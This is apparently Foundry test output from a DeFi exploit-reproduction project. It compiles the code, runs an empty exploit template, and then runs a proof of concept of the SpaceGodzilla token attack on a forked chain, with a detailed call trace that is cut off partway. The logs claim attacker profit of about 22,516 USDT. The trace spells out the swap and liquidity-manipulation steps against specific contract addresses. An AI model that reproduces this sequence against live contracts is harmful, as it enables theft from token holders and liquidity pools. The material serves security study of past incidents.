Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.33s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-07/SpaceGodzilla_exp.sol:52:5:
   |
52 |     address USDT = 0x55d398326f99059fF775485246999027B3197955;
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 607.86ms (1.80ms CPU time)

Ran 1 test for src/test/2022-07/SpaceGodzilla_exp.sol:AttackContract
[PASS] testExploit() (gas: 618855)
Logs:
  This reproduce shows how attacker exploit SpaceGodzilla, cause 25,378 BUSD lost
  [Note] We skipped the part where the attacker made a flash loan with 16 pools to get the initial capital
  [info] Attacker USDT Balance: 2952797.730003166405412733
  First swap amount0Out: 73760446706751073576274554073273
  address(this) SpaceGodzilla_balance: 71547633305548541368986317451004
  address(CakeLP) SpaceGodzilla_balance: 73851668636002387627318356601866
  First swap amount1Out: 2975314109773545495278570
  [info] Attacker Wallet USDT Balance: 2975314.109773545495358570
  [Profit] Attacker Wallet USDT Profit: 22516.379770379089945837

Traces:
  [657555] AttackContract::testExploit()
    ├─ [2531] USDT::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2952797730003166405412733 [2.952e24]
    ├─ emit log_named_decimal_uint(key: "[info] Attacker USDT Balance", val: 2952797730003166405412733 [2.952e24], decimals: 18)
    ├─ [139575] SpaceGodzilla::swapTokensForOther(69127461036369179405415017714 [6.912e28])
    │   ├─ [86841] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(69127461036369179405415017714 [6.912e28], 0, [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0, 0x55d398326f99059fF775485246999027B3197955], 0x8AfD2be03147a3b05f430A3652088b049B32b373, 1657743400 [1.657e9])
    │   │   ├─ [24670] SpaceGodzilla::transferFrom(SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], 69127461036369179405415017714 [6.912e28])
    │   │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], value: 69127461036369179405415017714 [6.912e28])
    │   │   │   ├─ emit Approval(owner: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 999628414157406786391433111821477696 [9.996e35])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x00000000000000000000000000000000000003bee89d2268b5acedd78cf35fad → 0x00000000000000000000000000000000000003bfc7fa07ac695e5d70fa4a4c9f
    │   │   │   │   @ 0x27891f12a988c45994218ee311898c791454e1332aa33c838c81200556ceab2a: 0x0000000000000000000000000000000000c0857d488907ec754f983dbc90d432 → 0x0000000000000000000000000000000000c0857c692c22a8c19e28a44f39e740
    │   │   │   │   @ 0x8f434e46d2029a37f333fc39aa3c7b7b9356eb10ea3a402f264ee13fb6a5e242: 0x0000000000000000000000000000000000000000f82e541255e1987195eece63 → 0x000000000000000000000000000000000000000018d16ecea23028d82897e171
    │   │   │   └─ ← [Return] true
    │   │   ├─ [2531] USDT::balanceOf(0x8AfD2be03147a3b05f430A3652088b049B32b373) [staticcall]
    │   │   │   └─ ← [Return] 2
    │   │   ├─ [2893] CakeLP::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 75972570174789479868300310831021 [7.597e31], 90560725378390149771577 [9.056e22], 1657743250 [1.657e9]
    │   │   ├─ [930] SpaceGodzilla::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   │   └─ ← [Return] 76041697635825849047705725848735 [7.604e31]
    │   │   ├─ [45644] CakeLP::swap(0, 82120689287810872625 [8.212e19], 0x8AfD2be03147a3b05f430A3652088b049B32b373, 0x)
    │   │   │   ├─ [10871] USDT::transfer(0x8AfD2be03147a3b05f430A3652088b049B32b373, 82120689287810872625 [8.212e19])
    │   │   │   │   ├─ emit Transfer(from: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], to: 0x8AfD2be03147a3b05f430A3652088b049B32b373, value: 82120689287810872625 [8.212e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc530b9a8a59cee431a0181b3678536a31ce4b0be2116116e577b765966a16275: 2 → 0x00000000000000000000000000000000000000000000000473a74bd02e317533
    │   │   │   │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x00000000000000000000000000000000000000000000132d4e87d05be79f3139 → 0x000000000000000000000000000000000000000000001328dae0848bb96dbc08
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [930] SpaceGodzilla::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   │   │   └─ ← [Return] 76041697635825849047705725848735 [7.604e31]
    │   │   │   ├─ [531] USDT::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   │   │   └─ ← [Return] 90478604689102338898952 [9.047e22]
    │   │   │   ├─ emit Sync(reserve0: 76041697635825849047705725848735 [7.604e31], reserve1: 90478604689102338898952 [9.047e22])
    │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 69127461036369179405415017714 [6.912e28], amount1In: 0, amount0Out: 0, amount1Out: 82120689287810872625 [8.212e19], to: 0x8AfD2be03147a3b05f430A3652088b049B32b373)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x000000000000000000000000000000000000000e0b7aef6863f84913cf1193e8 → 0x000000000000000000000000000000000000000e0e7ae32c57e3366b31235dea
    │   │   │   │   @ 10: 0x000000000000000000000003750b11a5e818004c2da0f9994707792b4545b9c7 → 0x00000000000000000000000375285e1d646546e2c0a7b050e941f3624b65050b
    │   │   │   │   @ 8: 0x62cf279200000000132d4e87d05be79f313903bee89d2268b5acedd78cf35fad → 0x62cf2828000000001328dae0848bb96dbc0803bfc7fa07ac695e5d70fa4a4c9f
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] USDT::balanceOf(0x8AfD2be03147a3b05f430A3652088b049B32b373) [staticcall]
    │   │   │   └─ ← [Return] 82120689287810872627 [8.212e19]
    │   │   └─ ← [Stop]
    │   ├─ [37883] 0x8AfD2be03147a3b05f430A3652088b049B32b373::withdraw()
    │   │   ├─ [531] USDT::balanceOf(0x8AfD2be03147a3b05f430A3652088b049B32b373) [staticcall]
    │   │   │   └─ ← [Return] 82120689287810872627 [8.212e19]
    │   │   ├─ [8071] USDT::transfer(SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], 16424137857562174525 [1.642e19])
    │   │   │   ├─ emit Transfer(from: 0x8AfD2be03147a3b05f430A3652088b049B32b373, to: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], value: 16424137857562174525 [1.642e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc530b9a8a59cee431a0181b3678536a31ce4b0be2116116e577b765966a16275: 0x00000000000000000000000000000000000000000000000473a74bd02e317533 → 0x0000000000000000000000000000000000000000000000038fb90973582790f6
    │   │   │   │   @ 0x8f434e46d2029a37f333fc39aa3c7b7b9356eb10ea3a402f264ee13fb6a5e242: 0x00000000000000000000000000000000000000000000066ed72024b4da93f659 → 0x00000000000000000000000000000000000000000000066fbb0e6711b09dda96
    │   │   │   └─ ← [Return] true
    │   │   ├─ [8071] USDT::transfer(0x39e21d3936cA530574d3B031a689230dFBa09721, 32848275715124349050 [3.284e19])
    │   │   │   ├─ emit Transfer(from: 0x8AfD2be03147a3b05f430A3652088b049B32b373, to: 0x39e21d3936cA530574d3B031a689230dFBa09721, value: 32848275715124349050 [3.284e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc530b9a8a59cee431a0181b3678536a31ce4b0be2116116e577b765966a16275: 0x0000000000000000000000000000000000000000000000038fb90973582790f6 → 0x000000000000000000000000000000000000000000000001c7dc84b9ac13c87c
    │   │   │   │   @ 0x052bbea15e13ef23df770d23c9d8deedcd2fe30b8a038a5079bcaba41e8ef722: 0x000000000000000000000000000000000000000000000d620f79c03dde2cd744 → 0x000000000000000000000000000000000000000000000d63d75644f78a409fbe
    │   │   │   └─ ← [Return] true
    │   │   ├─ [8071] USDT::transfer(0xDBBAABdd254f88F0a318d5bD03688F664a780ae3, 32848275715124349050 [3.284e19])
    │   │   │   ├─ emit Transfer(from: 0x8AfD2be03147a3b05f430A3652088b049B32b373, to: 0xDBBAABdd254f88F0a318d5bD03688F664a780ae3, value: 32848275715124349050 [3.284e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3372c8fbc08f99d938b0997536f570d4103036a4040e0c37f394fb0262bab5dd: 0x000000000000000000000000000000000000000000000d62100064d6e65eee0d → 0x000000000000000000000000000000000000000000000d63d7dce9909272b687
    │   │   │   │   @ 0xc530b9a8a59cee431a0181b3678536a31ce4b0be2116116e577b765966a16275: 0x000000000000000000000000000000000000000000000001c7dc84b9ac13c87c → 2
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x052bbea15e13ef23df770d23c9d8deedcd2fe30b8a038a5079bcaba41e8ef722: 0x000000000000000000000000000000000000000000000d620f79c03dde2cd744 → 0x000000000000000000000000000000000000000000000d63d75644f78a409fbe
    │   │   │   @ 0x8f434e46d2029a37f333fc39aa3c7b7b9356eb10ea3a402f264ee13fb6a5e242: 0x00000000000000000000000000000000000000000000066ed72024b4da93f659 → 0x00000000000000000000000000000000000000000000066fbb0e6711b09dda96
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   └─ ← [Stop]
    ├─ [893] CakeLP::getReserves() [staticcall]
    │   └─ ← [Return] 76041697635825849047705725848735 [7.604e31], 90478604689102338898952 [9.047e22], 1657743400 [1.657e9]
    ├─ [531] USDT::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2952797730003166405412733 [2.952e24]
    ├─ [6071] USDT::transfer(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], 2952797730003166405312733 [2.952e24])
    │   ├─ emit Transfer(from: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], value: 2952797730003166405312733 [2.952e24])
    │   ├─  storage changes:
    │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x000000000000000000000000000000000000000000001328dae0848bb96dbc08 → 0x0000000000000000000000000000000000000000000284705736a18e1b417ce5
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000271477c561d0261d5477d → 100000
    │   └─ ← [Return] true
    ├─ emit log_named_uint(key: "First swap amount0Out", val: 73760446706751073576274554073273 [7.376e31])
    ├─ [315285] CakeLP::swap(73760446706751073576274554073273 [7.376e31], 0, AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [299799] SpaceGodzilla::transfer(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 73760446706751073576274554073273 [7.376e31])
    │   │   ├─ [2774] 0x8AfD2be03147a3b05f430A3652088b049B32b373::warpToken(73760446706751073576274554073273 [7.376e31]) [staticcall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000003a2fcdb7d340a0c2c8ede4d30b9
    │   │   ├─ emit Transfer(from: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], to: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], value: 2212813401202532207288236622196 [2.212e30])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004bE297f5354e93c8e34B4bB66d12C3968D0c, value: 73760446706751073576274554 [7.376e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004be28176AE5F39fCF62e50Ff84aFEd9f24a5, value: 67054951551591885069340503 [6.705e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004bE26Af834C5cd73EC732f0906077A4DbE79, value: 61467038922292561313562128 [6.146e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004be25479c8824251e1cc1f18B76E07d2A0Fd, value: 56738805159039287366365041 [5.673e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004BE23dFb69948cbaFfFAF5F9E24dFD22A795, value: 52686033361965052554481824 [5.268e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004be2277D17fcA0d37Ed10f265A9a3d75f3aB, value: 49173631137834049050849702 [4.917e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004bE210fED3Ba72BfA42F37eFAb5127A89f17, value: 46100279191719420985171596 [4.61e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004Be1FA809cCDf6A3C4059Aa8680F9495ff08, value: 43388498062794749162514443 [4.338e25])
    │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: 0x00004Be1e402733720A44053A9Cda3B38787bD17, value: 40978025948195040875708085 [4.097e25])
    │   │   ├─ emit Transfer(from: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 71547633305548541368986317451004 [7.154e31])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9e92f51f3aad39844e7f188e14310e66ebb618375e434a16492051e06953ebb9: 0 → 0x0000000000000000000000000000000000000000003777703518a5368fc7cf57
    │   │   │   @ 0xe72bb77b3a98ce3a8fef31cae224d3865564ff39aa2ef05fe2e6ee0fcae6d961: 0 → 0x00000000000000000000000000000000000000000026221d2480f19582d95e8c
    │   │   │   @ 0x8f434e46d2029a37f333fc39aa3c7b7b9356eb10ea3a402f264ee13fb6a5e242: 0x000000000000000000000000000000000000000018d16ecea23028d82897e171 → 0x000000000000000000000000000000000000001c0537581e574effa097bb5401
    │   │   │   @ 0xbd0d4752fd260d7cd0a0c4497e3310ce8774ad8d0c8435c38d341268a03faa3b: 0 → 0x0000000000000000000000000000000000000000002b94b3976ecaf4034190a0
    │   │   │   @ 0xaf5a776dc048628547331c132b357d1b4bd6fc8814496858f3838881c0eef58c: 0 → 0x00000000000000000000000000000000000000000021e56f3ce464f6ad32feb5
    │   │   │   @ 0x3577105f898a90a0ce612b7db770b6c0ead4cfdc5f97f1d9e5dd1e53c4c050b7: 0 → 0x00000000000000000000000000000000000000000023e3df316a4cc8f39f680b
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000003870edf24f7991b2b38a98d6efc
    │   │   │   @ 19: 221087 → 221096
    │   │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x00000000000000000000000000000000000003bfc7fa07ac695e5d70fa4a4c9f → 0x000000000000000000000000000000000000001ccb1e8a785f5230e21bfd1c2f
    │   │   │   @ 0x9c3c5dc8ebecb7803db2d4474a0ee45922d111787bdbddc1deb186e0ccbfbb8f: 0 → 0x00000000000000000000000000000000000000000028acebe2abac5b363d31a6
    │   │   │   @ 0xb7ef7898805b087c42b164f7179613371a44a1add740f07628894230f3da44c8: 0 → 0x0000000000000000000000000000000000000000003d0361d4018288d15bca7a
    │   │   │   @ 0x97c1eda70109c7aa77f3652d02ebbbb4c8dd1faa525e57b0e0ddc97ad3a01351: 0 → 0x00000000000000000000000000000000000000000032d826db56977203cc7e10
    │   │   │   @ 0x3203f9746bbb8655517c0778ce56a84f7daf7b318fce8f12bc114450562bac96: 0 → 0x0000000000000000000000000000000000000000002eeee8ca7750b80381af71
    │   │   └─ ← [Return] true
    │   ├─ [930] SpaceGodzilla::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   └─ ← [Return] 2281250929074775471431171775535 [2.281e30]
    │   ├─ [531] USDT::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   └─ ← [Return] 3043276334692268744211685 [3.043e24]
    │   ├─ emit Sync(reserve0: 2281250929074775471431171775535 [2.281e30], reserve1: 3043276334692268744211685 [3.043e24])
    │   ├─ emit Swap(sender: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 73, amount1In: 2952797730003166405312733 [2.952e24], amount0Out: 73760446706751073576274554073273 [7.376e31], amount1Out: 0, to: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x62cf2828000000001328dae0848bb96dbc0803bfc7fa07ac695e5d70fa4a4c9f → 0x62cf28280000000284705736a18e1b417ce5001ccb1e8a785f5230e21bfd1c2f
    │   └─ ← [Stop]
    ├─ [105643] SpaceGodzilla::swapAndLiquifyStepv1()
    │   ├─ [531] USDT::balanceOf(SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0]) [staticcall]
    │   │   └─ ← [Return] 30395266313460073224854 [3.039e22]
    │   ├─ [97138] 0x10ED43C718714eb63d5aA57B78B54704E256024E::addLiquidity(USDT: [0x55d398326f99059fF775485246999027B3197955], SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], 30395266313460073224854 [3.039e22], 2220002882496531044102217356289 [2.22e30], 0, 0, 0xE1FC9cD1D8de4cE988FF7F30c73EaF28C4935339, 1657743400 [1.657e9])
    │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(USDT: [0x55d398326f99059fF775485246999027B3197955], SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0]) [staticcall]
    │   │   │   └─ ← [Return] CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]
    │   │   ├─ [893] CakeLP::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 2281250929074775471431171775535 [2.281e30], 3043276334692268744211685 [3.043e24], 1657743400 [1.657e9]
    │   │   ├─ [10834] USDT::transferFrom(SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], 30395266313460073224854 [3.039e22])
    │   │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], value: 30395266313460073224854 [3.039e22])
    │   │   │   ├─ emit Approval(owner: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 999999999999968183745697000623943713 [9.999e35])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x8f434e46d2029a37f333fc39aa3c7b7b9356eb10ea3a402f264ee13fb6a5e242: 0x00000000000000000000000000000000000000000000066fbb0e6711b09dda96 → 0
    │   │   │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x0000000000000000000000000000000000000000000284705736a18e1b417ce5 → 0x000000000000000000000000000000000000000000028ae01245089fcbdf577b
    │   │   │   │   @ 0x27891f12a988c45994218ee311898c791454e1332aa33c838c81200556ceab2a: 0x0000000000000000000000000000000000c097ce7bc906c8ab20274b255d8ab7 → 0x0000000000000000000000000000000000c097ce7bc90058f011c03974bfb021
    │   │   │   └─ ← [Return] true
    │   │   ├─ [8270] SpaceGodzilla::transferFrom(SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], 22784401379070786900867375327 [2.278e28])
    │   │   │   ├─ emit Transfer(from: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], to: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], value: 22784401379070786900867375327 [2.278e28])
    │   │   │   ├─ emit Approval(owner: SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 999628391373005407320646210954102369 [9.996e35])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x000000000000000000000000000000000000001ccb1e8a785f5230e21bfd1c2f → 0x000000000000000000000000000000000000001d14bd5b221223f915569c7d0e
    │   │   │   │   @ 0x27891f12a988c45994218ee311898c791454e1332aa33c838c81200556ceab2a: 0x0000000000000000000000000000000000c0857c692c22a8c19e28a44f39e740 → 0x0000000000000000000000000000000000c0857c1f8d51ff0ecc6071149a8661
    │   │   │   │   @ 0x8f434e46d2029a37f333fc39aa3c7b7b9356eb10ea3a402f264ee13fb6a5e242: 0x000000000000000000000000000000000000001c0537581e574effa097bb5401 → 0x000000000000000000000000000000000000001bbb988774a47d376d5d1bf322
    │   │   │   └─ ← [Return] true
    │   │   ├─ [65236] CakeLP::mint(0xE1FC9cD1D8de4cE988FF7F30c73EaF28C4935339)
    │   │   │   ├─ [930] SpaceGodzilla::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   │   │   └─ ← [Return] 2304035330453846258332039150862 [2.304e30]
    │   │   │   ├─ [531] USDT::balanceOf(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8]) [staticcall]
    │   │   │   │   └─ ← [Return] 3073671601005728817436539 [3.073e24]
    │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 3251042577250052746670525 [3.251e24])
    │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xE1FC9cD1D8de4cE988FF7F30c73EaF28C4935339, value: 22393449132968494501146434 [2.239e25])
    │   │   │   ├─ emit Sync(reserve0: 2304035330453846258332039150862 [2.304e30], reserve1: 3073671601005728817436539 [3.073e24])
    │   │   │   ├─ emit Mint(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 22784401379070786900867375327 [2.278e28], amount1: 30395266313460073224854 [3.039e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x417e9de065c0fc71b7af0417d9ea413ddd8e59ddca8b8f0e4720ae0a74485ba5: 0x000000000000000000000000000000000000000000383b50e46cb079d14da2d1 → 0x0000000000000000000000000000000000000000004ac15033c6e8e52a60d213
    │   │   │   │   @ 8: 0x62cf28280000000284705736a18e1b417ce5001ccb1e8a785f5230e21bfd1c2f → 0x62cf2828000000028ae01245089fcbdf577b001d14bd5b221223f915569c7d0e
    │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000073bf04a61e3143875ef5dc1 → 0x0000000000000000000000000000000000000000075126b91047dbc4c3d4fec0
    │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x0000000000000000000000000000000000000000008273f31672c1194279058d → 0x000000000000000000000000000000000000000000852462757d503a374b774a
    │   │   │   │   @ 11: 0x00000000000000000047d3d433ae56f5336e56e847f339ae1c3fb945cd48d5e2 → 0x00000000000000000049f01d0261221e20a55ec0dd6e6191361392dcd4e1d7ba
    │   │   │   └─ ← [Return] 22393449132968494501146434 [2.239e25]
    │   │   └─ ← [Return] 30395266313460073224854 [3.039e22], 22784401379070786900867375327 [2.278e28], 22393449132968494501146434 [2.239e25]
    │   └─ ← [Stop]
    ├─ [930] SpaceGodzilla::balanceOf(AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 71547633305548541368986317451004 [7.154e31]
    ├─ emit log_named_uint(key: "address(this) SpaceGodzilla_balance", val: 71547633305548541368986317451004 [7.154e31])
    ├─ [893] CakeLP::getReserves() [staticcall]
    │   └─ ← [Return] 2304035330453846258332039150862 [2.304e30], 3073671601005728817436539 [3.073e24], 1657743400 [1.657e9]
    ├─ [3271] USDT::transfer(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], 20000 [2e4])
    │   ├─ emit Transfer(from: AttackContract: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], value: 20000 [2e4])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 100000 → 80000
    │   │   @ 0x0a251b299094fe7653060a0da2916b93fbec2308fcacb83b6c04d01286617b24: 0x000000000000000000000000000000000000000000028ae01245089fcbdf577b → 0x000000000000000000000000000000000000000000028ae01245089fcbdfa59b
    │   └─ ← [Return] true
    ├─ [17729] SpaceGodzilla::transfer(CakeLP: [0x8AfF4e8d24F445Df313928839eC96c4A618a91C8], 71547633305548541368986317451004 [7.154e31])
    │   ├─ [465] CakeLP::token0() [staticcall]
    │   │   └─ ← [Return] SpaceGodzilla: [0x2287C04a15bb11ad1358BA5702C1C95E2D13a5E0]
    │   ├─ [397] CakeLP::token1() [staticcall]
    │   │   └─ ← [Return] USDT: [0x55d398326f99059fF775485246999027B3197955]
    │   ├─ [893] CakeLP::getReserves() [staticcall]
    │   │   └─ ← [Return] 2304035330453846258332039150862 [2.304e30], 3073671601005728817436539 [3.073e24], 1657743400 [1.657e9]
